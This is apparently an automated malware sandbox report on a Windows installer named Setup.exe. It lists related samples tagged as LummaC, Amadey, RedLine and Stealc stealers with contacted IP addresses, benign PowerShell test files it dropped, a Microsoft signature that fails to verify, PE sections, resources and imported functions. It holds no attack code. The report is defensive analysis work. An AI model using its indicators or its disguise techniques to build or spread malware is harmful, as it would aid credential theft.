	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	104.21.27.229 104.21.84.113 104.21.58.45

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.0818136700495735
Encrypted:	false
SSDEEP:	3:Nlllulrlgll//Z:NllUml
MD5:	BCE202BE96167104C292ABBA72DDA325
SHA1:	2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
SHA-256:	680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
SHA-512:	195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_checo44s.lwe.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzikyems.mg4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msheundz.qlk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zznsj3bk.pjd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	1.39533546365828
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	82'950'266 bytes
MD5:	cd7e85c71b3d9a273bcb5f3b3d8f51d5
SHA1:	2128655018d5c284364299dc3995a3a22c397d20
SHA256:	5579c8e89e85118cb2b7eb5d63d7b8ae3b4b7aba66aa719467ae1b2871d47716
SHA512:	af212657e1a965e9f6a28340ecb675343cc76785ad6e419218e46e85c64ce7a6f824f347e65c16475f803e69ca2140c98c51b1d64370fef5c0c124ec793d96cc
SSDEEP:	98304:zhBRUMWfT6APDkWXe0QTwdSEeieZPIpOpFtDP8ZlemkxB5Hh:VBK/fdDvbHeZPEOpFtLalzU5Hh
TLSH:	F3086D137603A935E35A053574B2DECED6BB7A122729C8C79AE435087F227C05BBA50F
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	8e3129693115b22b

Static PE Info

General

Entrypoint:	0xad34c4
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CEF0CF [Wed Aug 28 09:41:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	8f2cafafcff869305739bdefe1fcf5a8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	15/12/2020 21:24:20 02/12/2021 21:24:20
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	4068B1B0494EFA79F5A751DCCA8111CD
Thumbprint SHA-1:	914A09C2E02C696AF394048BCB8D95449BCD5B9E
Thumbprint SHA-256:	4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
Serial:	33000003DFFB6AE3F427ECB6A30000000003DF

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00ABD344h
call 00007FEC54165EB9h
call 00007FEC5415A5E8h
test eax, eax
jle 00007FEC54826561h
mov eax, dword ptr [00AEC830h]
mov eax, dword ptr [eax]
call 00007FEC54355650h
mov eax, dword ptr [00AEC830h]
mov eax, dword ptr [eax]
mov dl, 01h
call 00007FEC543577AEh
mov eax, dword ptr [00AEC830h]
mov eax, dword ptr [eax]
mov edx, 00AD3540h
call 00007FEC54355065h
mov ecx, dword ptr [00AEC2FCh]
mov eax, dword ptr [00AEC830h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00AB93DCh]
call 00007FEC54355631h
mov eax, dword ptr [00AEC830h]
mov eax, dword ptr [eax]
call 00007FEC54355785h
call 00007FEC5415DC78h
add byte ptr [eax], al
add byte ptr [eax-00FFFDFCh], dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x72d000	0xa1	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x726000	0x410a	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7be000	0xb4400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4f196aa	0x21d0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x730000	0x8d668	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x72f000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x726b78	0x9d4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x72b000	0x1008	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6cd804	0x6cda00	9e810849a3768c539ade020f426230b6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x6cf000	0x4564	0x4600	7b8024e28b76eede53904063dbfb3823	False	0.50625	data	6.272372191687461	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x6d4000	0x18f10	0x19000	892b5f67a1d8d30336355ddb54cfae58	False	0.53810546875	data	6.051028429946292	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x6ed000	0x3838c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x726000	0x410a	0x4200	e8f24f705e73a98d37d61f875ef4d0c6	False	0.32445549242424243	data	5.119901588578985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x72b000	0x1008	0x1200	2d109ec78aec904c416b05479a71981f	False	0.3159722222222222	data	4.1237776238666175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x72d000	0xa1	0x200	0710806c6fe6bdc5b10f2aa3700ad0e0	False	0.263671875	data	1.9706670627512914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x72e000	0x5c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x72f000	0x5d	0x200	a07c0e7fc816e93252c78c29efe661a5	False	0.189453125	data	1.387038204273433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x730000	0x8d668	0x8d800	7f165d3418625de7e39c908e9f68809f	False	0.5583056123012368	data	6.716833673463313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x7be000	0xb4400	0xb4400	11639e876fcd55bf698ef7168636ec0b	False	0.5751628055651873	data	7.370013475696566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x7bfa1c	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x7bfb50	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x7bfc84	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x7bfdb8	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x7bfeec	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x7c0020	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x7c0154	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x7c0288	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x7c0348	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x7c0428	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x7c0508	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x7c05e8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x7c06a8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x7c0768	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x7c0848	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x7c0908	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x7c09e8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x7c0aa8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_ICON	0x7c0b88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.26016597510373446
RT_ICON	0x7c3130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3630393996247655
RT_ICON	0x7c41d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.4290983606557377
RT_ICON	0x7c4b60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5957446808510638
RT_STRING	0x7c4fc8	0x3ae	AmigaOS bitmap font "p", fc_YSize 26880, 20224 elements, 2nd "a", 3rd " "			0.39278131634819535
RT_STRING	0x7c5378	0x386	data			0.43458980044345896
RT_STRING	0x7c5700	0x34	data			0.5384615384615384
RT_STRING	0x7c5734	0x28c	data			0.455521472392638
RT_STRING	0x7c59c0	0x42c	data			0.398876404494382
RT_STRING	0x7c5dec	0x368	data			0.40825688073394495
RT_STRING	0x7c6154	0x3d0	data			0.42213114754098363
RT_STRING	0x7c6524	0x784	data			0.340956340956341
RT_STRING	0x7c6ca8	0xb74	data			0.23260572987721692
RT_STRING	0x7c781c	0x574	data			0.3144699140401146
RT_STRING	0x7c7d90	0x410	data			0.3798076923076923
RT_STRING	0x7c81a0	0x52c	data			0.3821752265861027
RT_STRING	0x7c86cc	0x106c	data			0.1933872502378687
RT_STRING	0x7c9738	0x9c4	data			0.3328
RT_STRING	0x7ca0fc	0xa08	data			0.32009345794392524
RT_STRING	0x7cab04	0x910	data			0.2771551724137931
RT_STRING	0x7cb414	0x6e4	data			0.3089569160997732
RT_STRING	0x7cbaf8	0x1e4	data			0.44421487603305787
RT_STRING	0x7cbcdc	0x5b0	data			0.35782967032967034
RT_STRING	0x7cc28c	0x3ac	data			0.41702127659574467
RT_STRING	0x7cc638	0x450	data			0.39221014492753625
RT_STRING	0x7cca88	0x344	data			0.41866028708133973
RT_STRING	0x7ccdcc	0x420	data			0.4100378787878788
RT_STRING	0x7cd1ec	0x39c	data			0.43722943722943725
RT_STRING	0x7cd588	0x3c4	data			0.3796680497925311
RT_STRING	0x7cd94c	0x320	data			0.3775
RT_STRING	0x7cdc6c	0x2dc	data			0.41939890710382516
RT_STRING	0x7cdf48	0x268	data			0.49837662337662336
RT_STRING	0x7ce1b0	0x380	data			0.3627232142857143
RT_STRING	0x7ce530	0x414	data			0.32567049808429116
RT_STRING	0x7ce944	0x490	data			0.3809931506849315
RT_STRING	0x7cedd4	0x470	data			0.3538732394366197
RT_STRING	0x7cf244	0x32c	data			0.3682266009852217
RT_STRING	0x7cf570	0x410	data			0.41634615384615387
RT_STRING	0x7cf980	0x30c	data			0.441025641025641
RT_STRING	0x7cfc8c	0xa0	data			0.7
RT_STRING	0x7cfd2c	0xe0	data			0.6473214285714286
RT_STRING	0x7cfe0c	0x110	data			0.625
RT_STRING	0x7cff1c	0x3c0	data			0.4
RT_STRING	0x7d02dc	0x3fc	data			0.37450980392156863
RT_STRING	0x7d06d8	0x3bc	data			0.3880753138075314
RT_STRING	0x7d0a94	0x4f0	data			0.379746835443038
RT_STRING	0x7d0f84	0x38c	data			0.30176211453744495
RT_STRING	0x7d1310	0x3a0	data			0.42564655172413796
RT_STRING	0x7d16b0	0x378	data			0.40315315315315314
RT_STRING	0x7d1a28	0x65c	data			0.32432432432432434
RT_STRING	0x7d2084	0x464	data			0.36298932384341637
RT_STRING	0x7d24e8	0x45c	data			0.3387096774193548
RT_STRING	0x7d2944	0x370	data			0.36022727272727273
RT_STRING	0x7d2cb4	0x408	data			0.37790697674418605
RT_STRING	0x7d30bc	0x32c	data			0.3916256157635468
RT_STRING	0x7d33e8	0xd0	data			0.5721153846153846
RT_STRING	0x7d34b8	0xa0	data			0.65
RT_STRING	0x7d3558	0x2f4	data			0.458994708994709
RT_STRING	0x7d384c	0x458	data			0.29856115107913667
RT_STRING	0x7d3ca4	0x30c	data			0.4371794871794872
RT_STRING	0x7d3fb0	0x2f0	data			0.3776595744680851
RT_STRING	0x7d42a0	0x368	data			0.29243119266055045
RT_RCDATA	0x7d4608	0xd5d	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032154340836013
RT_RCDATA	0x7d5368	0xd57	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003221083455344
RT_RCDATA	0x7d60c0	0xcfc	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003309265944645
RT_RCDATA	0x7d6dbc	0xcd9	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033444816053512
RT_RCDATA	0x7d7a98	0xd5d	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032154340836013
RT_RCDATA	0x7d87f8	0xd57	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003221083455344
RT_RCDATA	0x7d9550	0xc4e	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0034920634920634
RT_RCDATA	0x7da1a0	0xc4e	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0034920634920634
RT_RCDATA	0x7dadf0	0xcb5	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033814940055334
RT_RCDATA	0x7dbaa8	0xcb0	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033866995073892
RT_RCDATA	0x7dc758	0xd56	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032220269478618
RT_RCDATA	0x7dd4b0	0xd47	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0032362459546926
RT_RCDATA	0x7de1f8	0xdc2	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031232254400908
RT_RCDATA	0x7defbc	0xdc5	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031205673758865
RT_RCDATA	0x7dfd84	0xcf3	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003318250377074
RT_RCDATA	0x7e0a78	0xced	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033242671501965
RT_RCDATA	0x7e1768	0xda9	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031455533314269
RT_RCDATA	0x7e2514	0xda6	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0031482541499714
RT_RCDATA	0x7e32bc	0xcf3	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.003318250377074
RT_RCDATA	0x7e3fb0	0xced	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced	English	United States	1.0033242671501965
RT_RCDATA	0x7e4ca0	0x10	data			1.5
RT_RCDATA	0x7e4cb0	0x148b	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0020916524054002
RT_RCDATA	0x7e613c	0x111e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0025102692834322
RT_RCDATA	0x7e725c	0xd8c	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.0031718569780854
RT_RCDATA	0x7e7fe8	0x1854	data			0.4836223506743738
RT_RCDATA	0x7e983c	0x2	data	English	United States	5.0
RT_RCDATA	0x7e9840	0x3ac1e	Delphi compiled form 'TFrmBoot'			0.6920555116965139
RT_GROUP_CURSOR	0x824460	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x824474	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x824488	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x82449c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8244b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8244c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x8244d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x8244ec	0x3e	data	English	United States	0.8064516129032258
RT_VERSION	0x82452c	0x3c8	data	English	United States	0.41115702479338845
RT_MANIFEST	0x8248f4	0x70b	XML 1.0 document, ASCII text, with CRLF, LF line terminators	English	United States	0.403771491957848

Imports

DLL	Import
mpr.dll	WNetGetConnectionW
winmm.dll	timeGetTime
shlwapi.dll	PathFileExistsW
wininet.dll	InternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW
winspool.drv	DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comdlg32.dll	GetOpenFileNameW
comctl32.dll	ImageList_GetImageInfo, FlatSB_SetScrollInfo, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll	SHGetSpecialFolderLocation, Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW, SHGetPathFromIDListW
user32.dll	MoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, PrivateExtractIconsW, GetMessageTime, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, GetCursor, KillTimer, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, CharToOemA, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, OemToCharA, DestroyMenu, SetWindowsHookExW, EmptyClipboard, GetDlgItem, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, GetKeyboardState, ScreenToClient, DrawFrameControl, SetCursor, CreateIcon, RemoveMenu, SubtractRect, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CountClipboardFormats, CallWindowProcW, CloseClipboard, DestroyCursor, UpdateLayeredWindow, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, CharUpperA, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll	SafeArrayPutElement, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantChangeType
wtsapi32.dll	WTSQueryUserToken
advapi32.dll	RegSetValueExW, RegConnectRegistryW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, DuplicateTokenEx, RegReplaceKeyW, RegCreateKeyExW, CreateProcessAsUserW, SetSecurityDescriptorDacl, RegLoadKeyW, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, RegDeleteValueW, RegFlushKey, RegQueryValueExW, RegEnumValueW, RegCloseKey, InitializeSecurityDescriptor, RegRestoreKeyW
msvcrt.dll	memcpy, memset, _gcvt
winhttp.dll	WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
